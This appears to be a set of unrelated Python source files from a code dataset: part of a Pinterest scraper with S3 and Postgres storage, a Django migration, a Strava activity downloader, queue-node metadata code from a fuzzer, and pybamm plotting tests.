# Grabs the tags present on the page.
self._grab_tags(self._xpath_dict['tag_container'])
# Grabs the image src and downloads the image of the page if applicable.
self._grab_image_src()
# If none of the layouts above are present the page layout is likely that of a story post.
else:
# Generates a unique id for the current page dict.
self._generate_unique_id()
# Grabs the title of the page.
self._grab_title(self._xpath_dict['h1_title_element'])
# As far as it is possible to tell there are no descriptions available for the story post layout.
self._current_dict["description"] = 'No description available Story format'
# Grabs the user account name and the follower count of the page.
self._grab_user_and_count(
self._xpath_dict['non_off_user_container'],
self._xpath_dict['non_off_user_element']
)
# Grabs the tags present on the page.
self._grab_tags(self._xpath_dict['story_tag_container'])
# Grabs the first image src and downloads the image of the page if applicable.
self._grab_story_image_srcs()
except KeyboardInterrupt:
raise KeyboardInterrupt
def _grab_page_data(self) -> None:
''' Defines a function which combines all data grab methods and loops through all page links
to grab the data from each page.
Arguments
---------
None
Returns
---------
None '''
try:
# Link set has hrefs appended during the run of the program, log defines the previously visited pages.
# Only go to the pages that are in the current run set and not in the log.
fresh_set = self._link_set.difference(self._log)
for (cat, link) in tqdm(list(fresh_set)):
# Grab only the name of the category to which the href belongs.
self._category = cat.split("/")[0]
# For every page we pass in a particular category increase the counter dictionary count of the category by 1.
self._counter_dict[f"{self._category}"] += 1
# Renew the current_dictionary for every page we visit.
self._current_dict = {}
# Go to the page for which we have the href.
self._driver.get(link)
# Grab all page data and download the image if applicable.
self._grab_all_users_and_counts()
# Append the current page dictionary to the main dictionary as a value to the key (category_(number of page in category list)).
self._main_dict[f"{self._category}"][f"{self._category}_{self._counter_dict[self._category]}"] = self._current_dict
except KeyboardInterrupt:
raise KeyboardInterrupt
def _data_dump(self, selected_category_names: list) -> None:
''' Defines a function which dumps the compiled dictionary for each category to its respective folder to be saved
as a json file.
Arguments
---------
selected_category_names: list (A list of all categories selected by the user for the current run.)
Returns
---------
None '''
try:
# If the data folder doesn't exist, create it and change directory to said data folder.
if not os.path.exists('../data'):
os.mkdir('../data')
os.chdir('..')
os.chdir('data')
print('Dumping Data: ')
# Dump the full dictionary for each category as a json file to its folder.
for name in tqdm(selected_category_names):
with open(f'temp_{name}/{name}.json', 'w') as loading:
json.dump(self._main_dict[f"{name}"], loading)
except KeyboardInterrupt:
raise KeyboardInterrupt
def _data_transferal(self, selected_category_names: list) -> None:
''' Defines a function which moves data from temp folders to it's final destination. Data is handled
in this way to remove errors when KeyboardInterrupting the scraping process.
Arguments
---------
selected_category_names: list (A list of all categories selected by the user for the current run.)
Returns
---------
None '''
try:
print('Moving files around a bit... ')
for category in tqdm(selected_category_names):
# Define the path for the file containing run data for the current category.
temp_path = f'../data/temp_{category}'
# If data is to be saved locally.
if category not in self._s3_list:
# Define the path which data will be stored in.
end_path = f'../data/{category}'
# If this is the first run ,or old data has been deleted via the users input.
if not os.path.exists(end_path):
# Simply rename the temp folder to the name of the final folder.
os.rename(temp_path, end_path)
# If end folder already exists from previous run
else:
# For every file in the temp folder, move it to the correct folder and delete the temp folder.
for file in os.listdir(temp_path):
shutil.move(f'{temp_path}/{file}', f'{end_path}/{file}')
shutil.rmtree(temp_path)
# If the data is to be stored remotely.
else:
# Define the path to save in the s3 bucket.
end_path = f'pinterest/{category}'
# For every file in the temp folder, move it to the correct place in the s3 bucket then delete the temp folder.
for file in os.listdir(temp_path):
self._s3_client.upload_file(
f'{temp_path}/{file}',
self.s3_bucket,
f'{end_path}/{file}'
)
shutil.rmtree(temp_path)
except KeyboardInterrupt:
raise KeyboardInterrupt
def _create_log(self, selected_category_names: list) -> bool:
''' Defines a function which creates two logs. One of which logs pages visited as to not repeat,
the other a log of where the most recent save for each category is in order to update the most recent
save on subsequent runs of the script.
Arguments
---------
selected_category_names: list (A list of all categories selected by the user for the current run.)
Returns
---------
bool (Returns as to whether the 2 logs have been succesfully created for testing purposes.) '''
try:
# if dict exists json.load
print('Creating save logs: ')
# If a save_log already exsists, load the log into a varibale in order to append to it before resaving.
if os.path.exists('../data/recent-save-log.json'):
with open('../data/recent-save-log.json', 'r') as load:
self.recent_save_dict = json.load(load)
# If the save_log does not exists already, initiate en empty dictionary to store the data for the log.
else:
self.recent_save_dict = {}
# For each category, check if the images should be saved remotely or locally.
for category in tqdm(selected_category_names):
# If saving remotely append the name of the bucket being saved to to the save_log.
if category in self._s3_list:
update = ['remote', self.s3_bucket]
# Else just say that the data was saved locally.
else:
update = 'local'
# Append the save location to the dictionary for each category being saved.
self.recent_save_dict[category] = update
# Open a context manager for both logs and dump the data to the approproate json file.
with open('../data/log.json', 'w') as log, open('../data/recent-save-log.json', 'w') \
as save:
json.dump(list(self._link_set), log)
json.dump(self.recent_save_dict, save)
return os.path.exists('../data/log.json') and os.path.exists('../data/recent-save-log.json')
except KeyboardInterrupt:
raise KeyboardInterrupt
def _delete_old_files(self, fresh: str, selected_category_names: list) -> None:
''' Defines a function that deletes old save files if they become outdated.
Arguments
---------
fresh: Union[str, None] ('Y' or 'N' if previous save data is detected and the user chooses so. \
None if no data relates to current run.) \n
selected_category_names: list (A list of all categories selected by the user for the current run.)
Returns
---------
None '''
try:
# If previosu save data has been detected by the script.
if fresh:
# Loads the save file.
with open('../data/recent-save-log.json', 'r') as load:
old_saves = json.load(load)
# Grabs the save categories relating to the current run.
saves = [key for key in old_saves if key in selected_category_names]
# For every category that relates to the current run.
for save in saves:
# If the new data is to be saved remotely to the same remote bucket as the previous save data.
if save in self._s3_list and old_saves[save][0] == 'remote' \
and old_saves[save][1] == self.s3_bucket:
# If the user wants to delete olf data, remove all old data from the S3 bucket.
if fresh == 'N':
s3 = boto3.resource('s3')
bucket = s3.Bucket(old_saves[save][1])
bucket.objects.filter(Prefix=f"pinterest/{save}/").delete()
# If the new data is to be saved remotely but to a different bucket than the previous save.
elif save in self._s3_list and old_saves[save][0] == 'remote' \
and old_saves[save][1] != self.s3_bucket:
# Get the data from the previous bucket.
s3 = boto3.resource('s3')
src_bucket = s3.Bucket(old_saves[save][1])
target_bucket = s3.Bucket(self.s3_bucket)
print('Relocating previous bucket save files. ')
# For every item in the older bucket.
for src in tqdm(src_bucket.objects.filter(Prefix=f"pinterest/{save}/")):
# If continuing from old data, move old data to new bucket and delete data from old bucket.
if fresh == 'Y':
copy_source = {
'Bucket': src_bucket.name,
'Key': src.key
}
target_bucket.copy(copy_source, src.key)
src.delete()
# If not continuing from old save data, delete old data.
elif fresh == 'N':
src.delete()
# If data to be saved locally but previous save was remote.
elif save not in self._s3_list and old_saves[save][0] == 'remote':
# Grab all data from old bucket.
s3 = boto3.resource('s3')
src_bucket = s3.Bucket(old_saves[save][1])
print('Relocating previous bucket save files. ')
# For every item in old bucket.
for src in tqdm(src_bucket.objects.filter(Prefix=
f"pinterest/{save}/")):
# If continuing from old data, download remote data to correct local folder, delete data from bucket.
if fresh == 'Y':
src_bucket.download_file(src.key,
f"../data/temp_{save}/{src.key.split('/')[2]}")
src.delete()
# If not continuing from old data, delete data from old bucket.
elif fresh == 'N':
src.delete()
# If new data to be saved locally and old data is also local. Pass unless not continuing from old data.
elif save not in self._s3_list and old_saves[save] == 'local':
# If not contunuing from old data, delete old data.
if fresh == 'N':
shutil.rmtree(f'../data/{save}')
# If new data to be saved remotely and old data is local.
elif save in self._s3_list and old_saves[save] == 'local':
# Grab the remote bucket.
s3 = boto3.resource('s3')
print('Relocating previous local save files. ')
# For every item in old local folder.
for item in tqdm(os.listdir(f'../data/{save}')):
# If continuing from old data, upload previous data to designated bucket and delete data from local
if fresh == 'Y':
self._s3_client.upload_file(f'../data/{save}/{item}',
self.s3_bucket, f'pinterest/{save}/{item}')
# If not continuing from old data, delete old data.
elif fresh == 'N':
pass
shutil.rmtree(f'../data/{save}')
else:
# If there is a mistake in above code and something goes wrong, abort script to save integrity of old data.
print('Missed a scenario in _delete_old_files. ')
self._driver.quit()
except KeyboardInterrupt:
raise KeyboardInterrupt
def _connect_to_RDS(self, remote: bool) -> Engine:
''' Defines a function which collects the connection information to an RDS in order to connect
to said RDS.
Arguments
---------
remote: bool (A boolean to determine whether or not to create/connect to an RDS.)
Returns
---------
engine: Engine (The RDS engine to connect to the RDS and issue commands.) '''
DATABASE_TYPE = 'postgresql'
DBAPI = 'psycopg2'
# Ask for user information from script user. If none given default to postgres.
USER = self._argsv[13]
if not USER:
USER = 'postgres'
# Asks the user for a conenction password.
PASSWORD = self._argsv[14]
# Asks the user for the connection port, if none given, default to 5433.
PORT = self._argsv[15]
if not PORT:
PORT = 5433
# Asks the user for the database name, if none given, default to Pagila.
DATABASE = self._argsv[16]
if not DATABASE:
DATABASE = 'Pagila'
# If the user wants to mae a remote RDS change the engine being created to support AWS RDS
if remote:
ENDPOINT = self._argsv[17]
engine = create_engine(f"{DATABASE_TYPE}+{DBAPI}://{USER}:{PASSWORD}@{ENDPOINT}:{PORT}/{DATABASE}")
else:
# Asks the user for the host, if none given, default to localhost.
HOST = self._argsv[18]
if not HOST:
HOST = 'localhost'
engine = create_engine(f"{DATABASE_TYPE}+{DBAPI}://{USER}:{PASSWORD}@{HOST}:{PORT}/{DATABASE}")
# Connect to the RDS
engine.connect()
return engine
def _process_df(self, df) -> DataFrame:
''' Defines a function which rearranges the dataframe into the proper format before sending to the RDS.
Arguments
---------
df: dataframe (pandas dataframe to reformat.)
Returns
---------
df: dataframe (The pandas dataframe in the correct format to send to the RDS.) '''
# Transpose the dataframe.
df = df.T
df['name'] = df.index
# Make unique_id the index of the dataframe.
df = df.set_index('unique_id')
file_name_col = df.pop('name')
df.insert(0, 'name', file_name_col)
print(df.head(3))
return df
def _json_to_rds(self, data_path:str, remote: bool) -> None:
''' Defines a function which loads teh json files from both remote and local folders and turns
the data in to an RDS.
Arguments
---------
data_path: str (The local path where json files are stored.) \n
remote: bool (A boolean to determine whether or not to create/connect to an RDS.)
Returns
---------
None '''
# Connect to RDS.
engine = self._connect_to_RDS(remote)
# Find all local JSON files.
folders = os.listdir(data_path)
recent_log = folders[folders.index('recent-save-log.json')]
with open(data_path + '/' + recent_log) as log_file:
recent_saves = json.load(log_file)
# Check content of log to check if the data are on S3 or on local PC.
for key, val in recent_saves.items():
# For local JSON files.
if type(val) == str:
json_path = data_path + '/' + key + '/' + key +'.json'
print(json_path)
# Load local JSON file as a dataframe.
df = pd.read_json(json_path)
df = self._process_df(df)
df.to_sql(f'pinterest_{key}', engine, if_exists='replace')
# For remote JSON files.
elif type(val) == list:
# Load file from S3 bucket.
json_obj = self._s3_client.get_object(
Bucket = val[1],
Key = (f'pinterest/{key}/{key}.json')
)
save_dict = json.loads(json_obj['Body'].read())
# Load as a dataframe.
df = pd.DataFrame.from_dict(save_dict)
df = self._process_df(df)
df.to_sql(f'pinterest_{key}', engine, if_exists='replace')
def get_category_data(self) -> None:
''' Defines a public function which combines all of the previously defines methods in order to scrape
the pinterest page how the user defines.
Arguments
---------
None
Returns
---------
None '''
# External try loop for KeyboardInterrupt robustness.
try:
# Get the categories on the root page.
category_link_dict = self._get_category_links(self._xpath_dict['categories_container'])
sleep(0.75)
# Display categories as options to the user.
self._print_options(category_link_dict)
# Asks the user what categories they would like to scrape.
selected_category_names, selected_category = self._get_user_input(category_link_dict)
# Asks the user what categories they would like to download images for.
self._categories_to_save_imgs(selected_category_names)
# Asks the user if they would like to save any data to the cloud.
self._save_to_cloud_or_local(selected_category_names)
# Initialises counter dict and temp save folders.
self._initialise_counter(selected_category_names)
self._initialise_local_folders('../data', selected_category_names)
# Searches for previosu save data.
fresh = self._check_for_logs(selected_category_names)
# Asks the user how many times they would like to scrill through each category page.
while True:
try:
scrolling_times = int(self._argsv[10])
break
except KeyboardInterrupt:
raise KeyboardInterrupt
except:
print('Invalid input, try again: ')
# Grabs the hrefs for the images/data to be grabbed.
self._grab_images_src(selected_category, n_scrolls=scrolling_times)
# Grabs data for every href saved.
self._grab_page_data()
# Deletes redundant data.
self._delete_old_files(fresh, selected_category_names)
# Saves data dictionaries as JSON files.
self._data_dump(selected_category_names)
print('Please do not end the script now. May cause errors with later runs. ')
# Moves data from temp save folders to final destination.
self._data_transferal(selected_category_names)
# Creates logs of the data collection for subsequent runs.
log_created = self._create_log(selected_category_names)
self._driver.quit()
# If there is a keyboard interrupt, preserve old save integrity and delete any new run data.
except KeyboardInterrupt:
print('\nTerminating Script.\nRemoving any accumulated data. ')
try:
if selected_category_names:
for category in tqdm(selected_category_names):
if os.path.exists(f'../data/temp_{category}'):
shutil.rmtree(f'../data/temp_{category}')
finally:
exit()
if __name__ == "__main__":
# Initiate the scraper.
pinterest_scraper = PinterestScraper('https://www.pinterest.co.uk/ideas/')
# Run the scraper.
pinterest_scraper.get_category_data()
# Create RDS from collected data.
pinterest_scraper.create_RDS()
|
StarcoderdataPython
|
3369746
|
<reponame>dmm34/voteapp
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-08 16:11
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('voteapp', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Voter',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=30)),
('last_name', models.CharField(max_length=30)),
('voter_id', models.CharField(max_length=30)),
],
),
migrations.AddField(
model_name='question',
name='type',
field=models.CharField(default=None, max_length=200),
),
]
|
StarcoderdataPython
|
1604385
|
from abc import ABCMeta, abstractmethod
class Action:
__metaclass__ = ABCMeta
def __init__(self, scraper):
self._scraper = scraper
self._web_driver = scraper.web_driver
@abstractmethod
def do(self): raise NotImplementedError
@abstractmethod
def on_fail(self): raise NotImplementedError
|
StarcoderdataPython
|
4837975
|
<gh_stars>0
import json
import os
from data_import.profile_information import ProfileInfo
from data_import.api import WebImporter
def download_activities_from_api(
profile: ProfileInfo,
save_path: str,
file_name: str = 'activities'
):
# download activities
importer = WebImporter(profile.client_id, profile.client_secret, profile.refresh_token)
activities = importer.get_activities()
serialized_activities = [activity.to_dict() for activity in activities]
# save to json
os.makedirs(save_path, exist_ok=True)
filename = file_name + '.json'
with open(os.path.join(save_path, filename), 'w') as fout:
json.dump(serialized_activities, fout, ensure_ascii=False, indent=4)
|
StarcoderdataPython
|
3323791
|
<reponame>SafeBreach-Labs/hAFL2<gh_stars>100-1000
# Copyright 2017-2019 <NAME>, <NAME>, <NAME>
# Copyright 2019-2020 Intel Corporation
#
# SPDX-License-Identifier: AGPL-3.0-or-later
"""
Fuzz inputs are managed as nodes in a queue. Any persistent metadata is stored here as node attributes.
"""
import lz4.frame
import mmh3
import msgpack
from common.config import FuzzerConfiguration
from common.util import read_binary_file, atomic_write
class QueueNode:
NextID = 1
def __init__(self, payload, bitmap, node_struct, write=True):
self.node_struct = node_struct
self.busy = False
self.set_id(QueueNode.NextID, write=False)
QueueNode.NextID += 1
self.set_payload(payload, write=write)
# store individual bitmaps only in debug mode
if bitmap and FuzzerConfiguration().argument_values['v']:
self.write_bitmap(bitmap)
@staticmethod
def get_metadata(id):
return msgpack.unpackb(read_binary_file(QueueNode.__get_metadata_filename(id)), raw=False, strict_map_key=False)
@staticmethod
def get_payload(exitreason, id):
return read_binary_file(QueueNode.__get_payload_filename(exitreason, id))
def __get_bitmap_filename(self):
workdir = FuzzerConfiguration().argument_values['work_dir']
filename = "/bitmaps/payload_%05d.lz4" % (self.get_id())
return workdir + filename
@staticmethod
def __get_payload_filename(exit_reason, id):
workdir = FuzzerConfiguration().argument_values['work_dir']
filename = "/corpus/%s/payload_%05d" % (exit_reason, id)
return workdir + filename
@staticmethod
def __get_metadata_filename(id):
workdir = FuzzerConfiguration().argument_values['work_dir']
return workdir + "/metadata/node_%05d" % id
def update_file(self, write=True):
if write:
self.write_metadata()
self.dirty = False
else:
self.dirty = True
def write_bitmap(self, bitmap):
atomic_write(self.__get_bitmap_filename(), lz4.frame.compress(bitmap))
def write_metadata(self):
return atomic_write(QueueNode.__get_metadata_filename(self.get_id()), msgpack.packb(self.node_struct, use_bin_type=True))
def load_metadata(self):
QueueNode.get_metadata(self.id)
@staticmethod
# will be used both for the final update and the intermediate update in the statelogic. Needs to work in both occasions!
# That means it needs to be able to apply an update to another update as well as the final meta data
# This function must leave new_data unchanged, but may change old_data
def apply_metadata_update(old_data, new_data):
new_data = new_data.copy() # if we remove keys deeper than attention_execs and attention_secs, we need a deep copy
old_data["attention_execs"] = old_data.get("attention_execs", 0) + new_data["attention_execs"]
old_data["attention_secs"] = old_data.get("attention_secs", 0) + new_data["attention_secs"]
for key in ["state_time_initial", "state_time_havoc", "state_time_grimoire", "state_time_grimoire_inference",
"state_time_redqueen"]:
old_data[key] = old_data.get(key, 0) + new_data[key]
del new_data[key]
del new_data["attention_execs"]
del new_data["attention_secs"]
old_data.update(new_data)
return old_data
def update_metadata(self, delta, write=True):
self.node_struct = QueueNode.apply_metadata_update(self.node_struct, delta)
self.update_file(write=True)
def set_payload(self, payload, write=True):
self.set_payload_len(len(payload), write=False)
atomic_write(QueueNode.__get_payload_filename(self.get_exit_reason(), self.get_id()), payload)
def get_payload_len(self):
return self.node_struct["payload_len"]
def set_payload_len(self, val, write=True):
self.node_struct["payload_len"] = val
self.update_file(write)
def get_id(self):
return self.node_struct["id"]
def set_id(self, val, write=True):
self.node_struct["id"] = val
self.update_file(write)
def get_new_bytes(self):
return self.node_struct["new_bytes"]
def set_new_bytes(self, val, write=True):
self.node_struct["new_bytes"] = val
self.update_file(write)
def get_new_bits(self):
return self.node_struct["new_bits"]
def clear_fav_bits(self, write=True):
self.node_struct["fav_bits"] = {}
self.update_file(write)
def get_fav_bits(self):
return self.node_struct["fav_bits"]
def add_fav_bit(self, index, write=True):
self.node_struct["fav_bits"][index] = 0
self.update_file(write)
def remove_fav_bit(self, index, write=True):
assert index in self.node_struct["fav_bits"]
self.node_struct["fav_bits"].pop(index)
self.update_file(write)
def set_new_bits(self, val, write=True):
self.node_struct["new_bits"] = val
self.update_file(write)
def get_level(self):
return self.node_struct["level"]
def set_level(self, val, write=True):
self.node_struct["level"] = val
self.update_file(write)
def is_favorite(self):
return len(self.node_struct["fav_bits"]) > 0
def get_parent_id(self):
return self.node_struct["info"]["parent"]
def get_initial_performance(self):
return self.node_struct["info"]["performance"]
def get_performance(self):
return self.node_struct["performance"]
def set_performance(self, val, write=True):
self.node_struct["performance"] = val
self.update_file(write)
def get_state(self):
return self.node_struct["state"]["name"]
def set_state(self, val, write=True):
self.node_struct["state"]["name"] = val
self.update_file(write)
def get_exit_reason(self):
return self.node_struct["info"]["exit_reason"]
def set_exit_reason(self, val, write=True):
self.node_struct["info"]["exit_reason"] = val
self.update_file(write)
def get_fav_factor(self):
return self.node_struct["fav_factor"]
def set_score(self, val):
self.node_struct["score"] = val
def get_score(self):
return self.node_struct["score"]
def set_fav_factor(self, val, write=True):
self.node_struct["fav_factor"] = val
self.update_file(write)
def set_free(self):
self.busy = False
def set_busy(self):
self.busy = True
def is_busy(self):
return self.busy
|
StarcoderdataPython
|
3217874
|
import pybamm
import unittest
import numpy as np
class TestQuickPlot(unittest.TestCase):
def test_simple_ode_model(self):
model = pybamm.lithium_ion.BaseModel(name="Simple ODE Model")
whole_cell = ["negative electrode", "separator", "positive electrode"]
# Create variables: domain is explicitly empty since these variables are only
# functions of time
a = pybamm.Variable("a", domain=[])
b = pybamm.Variable("b", domain=[])
c = pybamm.Variable("c", domain=[])
# Simple ODEs
model.rhs = {a: pybamm.Scalar(2), b: pybamm.Scalar(0), c: -c}
# Simple initial conditions
model.initial_conditions = {
a: pybamm.Scalar(0),
b: pybamm.Scalar(1),
c: pybamm.Scalar(1),
}
# no boundary conditions for an ODE model
# Broadcast some of the variables
model.variables = {
"a": a,
"b broadcasted": pybamm.FullBroadcast(b, whole_cell, "current collector"),
"c broadcasted": pybamm.FullBroadcast(
c, ["negative electrode", "separator"], "current collector"
),
"b broadcasted negative electrode": pybamm.PrimaryBroadcast(
b, "negative particle"
),
"c broadcasted positive electrode": pybamm.PrimaryBroadcast(
c, "positive particle"
),
}
model.timescale = pybamm.Scalar(1)
# ODEs only (don't use jacobian)
model.use_jacobian = False
# Process and solve
geometry = model.default_geometry
param = model.default_parameter_values
param.process_model(model)
param.process_geometry(geometry)
mesh = pybamm.Mesh(geometry, model.default_submesh_types, model.default_var_pts)
disc = pybamm.Discretisation(mesh, model.default_spatial_methods)
disc.process_model(model)
solver = model.default_solver
t_eval = np.linspace(0, 2, 100)
solution = solver.solve(model, t_eval)
quick_plot = pybamm.QuickPlot(
solution,
[
"a",
"b broadcasted",
"c broadcasted",
"b broadcasted negative electrode",
"c broadcasted positive electrode",
],
)
quick_plot.plot(0)
# update the axis
new_axis = [0, 0.5, 0, 1]
quick_plot.axis_limits.update({("a",): new_axis})
self.assertEqual(quick_plot.axis_limits[("a",)], new_axis)
# and now reset them
quick_plot.reset_axis()
self.assertNotEqual(quick_plot.axis_limits[("a",)], new_axis)
# check dynamic plot loads
quick_plot.dynamic_plot(testing=True)
quick_plot.slider_update(0.01)
# Test with different output variables
quick_plot = pybamm.QuickPlot(solution, ["b broadcasted"])
self.assertEqual(len(quick_plot.axis_limits), 1)
quick_plot.plot(0)
quick_plot = pybamm.QuickPlot(
solution,
[
["a", "a"],
["b broadcasted", "b broadcasted"],
"c broadcasted",
"b broadcasted negative electrode",
"c broadcasted positive electrode",
],
)
self.assertEqual(len(quick_plot.axis_limits), 5)
quick_plot.plot(0)
# update the axis
new_axis = [0, 0.5, 0, 1]
var_key = ("c broadcasted",)
quick_plot.axis_limits.update({var_key: new_axis})
self.assertEqual(quick_plot.axis_limits[var_key], new_axis)
# and now reset them
quick_plot.reset_axis()
self.assertNotEqual(quick_plot.axis_limits[var_key], new_axis)
# check dynamic plot loads
quick_plot.dynamic_plot(testing=True)
quick_plot.slider_update(0.01)
# Test longer name
model.variables["Variable with a very long name"] = model.variables["a"]
quick_plot = pybamm.QuickPlot(solution, ["Variable with a very long name"])
quick_plot.plot(0)
# Test different inputs
quick_plot = pybamm.QuickPlot(
[solution, solution],
["a"],
colors=["r", "g", "b"],
linestyles=["-", "--"],
figsize=(1, 2),
labels=["sol 1", "sol 2"],
)
self.assertEqual(quick_plot.colors, ["r", "g", "b"])
self.assertEqual(quick_plot.linestyles, ["-", "--"])
self.assertEqual(quick_plot.figsize, (1, 2))
self.assertEqual(quick_plot.labels, ["sol 1", "sol 2"])
# Test different time units
quick_plot = pybamm.QuickPlot(solution, ["a"])
self.assertEqual(quick_plot.time_scaling_factor, 1)
quick_plot = pybamm.QuickPlot(solution, ["a"], time_unit="seconds")
quick_plot.plot(0)
self.assertEqual(quick_plot.time_scaling_factor, 1)
np.testing.assert_array_almost_equal(
quick_plot.plots[("a",)][0][0].get_xdata(), t_eval
)
np.testing.assert_array_almost_equal(
quick_plot.plots[("a",)][0][0].get_ydata(), 2 * t_eval
)
quick_plot = pybamm.QuickPlot(solution, ["a"], time_unit="minutes")
quick_plot.plot(0)
self.assertEqual(quick_plot.time_scaling_factor, 60)
np.testing.assert_array_almost_equal(
quick_plot.plots[("a",)][0][0].get_xdata(), t_eval / 60
)
np.testing.assert_array_almost_equal(
quick_plot.plots[("a",)][0][0].get_ydata(), 2 * t_eval
)
quick_plot = pybamm.QuickPlot(solution, ["a"], time_unit="hours")
quick_plot.plot(0)
self.assertEqual(quick_plot.time_scaling_factor, 3600)
np.testing.assert_array_almost_equal(
quick_plot.plots[("a",)][0][0].get_xdata(), t_eval / 3600
)
np.testing.assert_array_almost_equal(
quick_plot.plots[("a",)][0][0].get_ydata(), 2 * t_eval
)
with self.assertRaisesRegex(ValueError, "time unit"):
pybamm.QuickPlot(solution, ["a"], time_unit="bad unit")
# long solution defaults to hours instead of seconds
solution_long = solver.solve(model, np.linspace(0, 1e5))
quick_plot = pybamm.QuickPlot(solution_long, ["a"])
self.assertEqual(quick_plot.time_scaling_factor, 3600)
# Test different spatial units
quick_plot = pybamm.QuickPlot(solution, ["a"])
self.assertEqual(quick_plot.spatial_unit, "$\mu m$")
quick_plot = pybamm.QuickPlot(solution, ["a"], spatial_unit="m")
self.assertEqual(quick_plot.spatial_unit, "m")
quick_plot = pybamm.QuickPlot(solution, ["a"], spatial_unit="mm")
self.assertEqual(quick_plot.spatial_unit, "mm")
quick_plot = pybamm.QuickPlot(solution, ["a"], spatial_unit="um")
self.assertEqual(quick_plot.spatial_unit, "$\mu m$")
with self.assertRaisesRegex(ValueError, "spatial unit"):
pybamm.QuickPlot(solution, ["a"], spatial_unit="bad unit")
# Test 2D variables
model.variables["2D variable"] = disc.process_symbol(
pybamm.FullBroadcast(
1, "negative particle", {"secondary": "negative electrode"}
)
)
quick_plot = pybamm.QuickPlot(solution, ["2D variable"])
quick_plot.plot(0)
quick_plot.dynamic_plot(testing=True)
quick_plot.slider_update(0.01)
with self.assertRaisesRegex(NotImplementedError, "Cannot plot 2D variables"):
pybamm.QuickPlot([solution, solution], ["2D variable"])
# Test different variable limits
quick_plot = pybamm.QuickPlot(
solution, ["a", ["c broadcasted", "c broadcasted"]], variable_limits="tight"
)
self.assertEqual(quick_plot.axis_limits[("a",)][2:], [None, None])
self.assertEqual(
quick_plot.axis_limits[("c broadcasted", "c broadcasted")][2:], [None, None]
)
quick_plot.plot(0)
quick_plot.slider_update(1)
quick_plot = pybamm.QuickPlot(
solution, ["2D variable"], variable_limits="tight"
)
self.assertEqual(quick_plot.variable_limits[("2D variable",)], (None, None))
quick_plot.plot(0)
quick_plot.slider_update(1)
quick_plot = pybamm.QuickPlot(
solution,
["a", ["c broadcasted", "c broadcasted"]],
variable_limits={"a": [1, 2], ("c broadcasted", "c broadcasted"): [3, 4]},
)
self.assertEqual(quick_plot.axis_limits[("a",)][2:], [1, 2])
self.assertEqual(
quick_plot.axis_limits[("c broadcasted", "c broadcasted")][2:], [3, 4]
)
quick_plot.plot(0)
quick_plot.slider_update(1)
quick_plot = pybamm.QuickPlot(
solution, ["a", "b broadcasted"], variable_limits={"a": "tight"}
)
self.assertEqual(quick_plot.axis_limits[("a",)][2:], [None, None])
self.assertNotEqual(
quick_plot.axis_limits[("b broadcasted",)][2:], [None, None]
)
quick_plot.plot(0)
quick_plot.slider_update(1)
with self.assertRaisesRegex(
TypeError, "variable_limits must be 'fixed', 'tight', or a dict"
):
pybamm.QuickPlot(
solution, ["a", "b broadcasted"], variable_limits="bad variable limits"
)
# Test errors
with self.assertRaisesRegex(ValueError, "Mismatching variable domains"):
pybamm.QuickPlot(solution, [["a", "b broadcasted"]])
with self.assertRaisesRegex(ValueError, "labels"):
pybamm.QuickPlot(
[solution, solution], ["a"], labels=["sol 1", "sol 2", "sol 3"]
)
# No variable can be NaN
model.variables["NaN variable"] = disc.process_symbol(pybamm.Scalar(np.nan))
with self.assertRaisesRegex(
ValueError, "All-NaN variable 'NaN variable' provided"
):
pybamm.QuickPlot(solution, ["NaN variable"])
pybamm.close_plots()
def test_spm_simulation(self):
# SPM
model = pybamm.lithium_ion.SPM()
sim = pybamm.Simulation(model)
t_eval = np.linspace(0, 10, 2)
sim.solve(t_eval)
# mixed simulation and solution input
# solution should be extracted from the simulation
quick_plot = pybamm.QuickPlot([sim, sim.solution])
quick_plot.plot(0)
pybamm.close_plots()
def test_loqs_spme(self):
t_eval = np.linspace(0, 10, 2)
for model in [pybamm.lithium_ion.SPMe(), pybamm.lead_acid.LOQS()]:
geometry = model.default_geometry
param = model.default_parameter_values
param.process_model(model)
param.process_geometry(geometry)
var = pybamm.standard_spatial_vars
var_pts = {var.x_n: 5, var.x_s: 5, var.x_p: 5, var.r_n: 5, var.r_p: 5}
mesh = pybamm.Mesh(geometry, model.default_submesh_types, var_pts)
disc = pybamm.Discretisation(mesh, model.default_spatial_methods)
disc.process_model(model)
solver = model.default_solver
solution = solver.solve(model, t_eval)
pybamm.QuickPlot(solution)
# check 1D (space) variables update properly for different time units
t = solution["Time [s]"].entries
c_e_var = solution["Electrolyte concentration [mol.m-3]"]
# 1D variables should be evaluated on edges
L_x = param.evaluate(pybamm.geometric_parameters.L_x)
c_e = c_e_var(t=t, x=mesh.combine_submeshes(*c_e_var.domain).edges * L_x)
for unit, scale in zip(["seconds", "minutes", "hours"], [1, 60, 3600]):
quick_plot = pybamm.QuickPlot(
solution, ["Electrolyte concentration [mol.m-3]"], time_unit=unit
)
quick_plot.plot(0)
qp_data = (
quick_plot.plots[("Electrolyte concentration [mol.m-3]",)][0][
0
].get_ydata(),
)[0]
np.testing.assert_array_almost_equal(qp_data, c_e[:, 0])
quick_plot.slider_update(t_eval[-1] / scale)
qp_data = (
quick_plot.plots[("Electrolyte concentration [mol.m-3]",)][0][
0
].get_ydata(),
)[0][:, 0]
np.testing.assert_array_almost_equal(qp_data, c_e[:, 1])
# test quick plot of particle for spme
if model.name == "Single Particle Model with electrolyte":
output_variables = [
"X-averaged negative particle concentration [mol.m-3]",
"X-averaged positive particle concentration [mol.m-3]",
"Negative particle concentration [mol.m-3]",
"Positive particle concentration [mol.m-3]",
]
pybamm.QuickPlot(solution, output_variables)
# check 2D (space) variables update properly for different time units
c_n = solution["Negative particle concentration [mol.m-3]"].entries
for unit, scale in zip(["seconds", "minutes", "hours"], [1, 60, 3600]):
quick_plot = pybamm.QuickPlot(
solution,
["Negative particle concentration [mol.m-3]"],
time_unit=unit,
)
quick_plot.plot(0)
qp_data = quick_plot.plots[
("Negative particle concentration [mol.m-3]",)
][0][1]
np.testing.assert_array_almost_equal(qp_data, c_n[:, :, 0])
quick_plot.slider_update(t_eval[-1] / scale)
qp_data = quick_plot.plots[
("Negative particle concentration [mol.m-3]",)
][0][1]
np.testing.assert_array_almost_equal(qp_data, c_n[:, :, 1])
pybamm.close_plots()
def test_plot_1plus1D_spme(self):
spm = pybamm.lithium_ion.SPMe(
{"current collector": "potential pair", "dimensionality": 1}
)
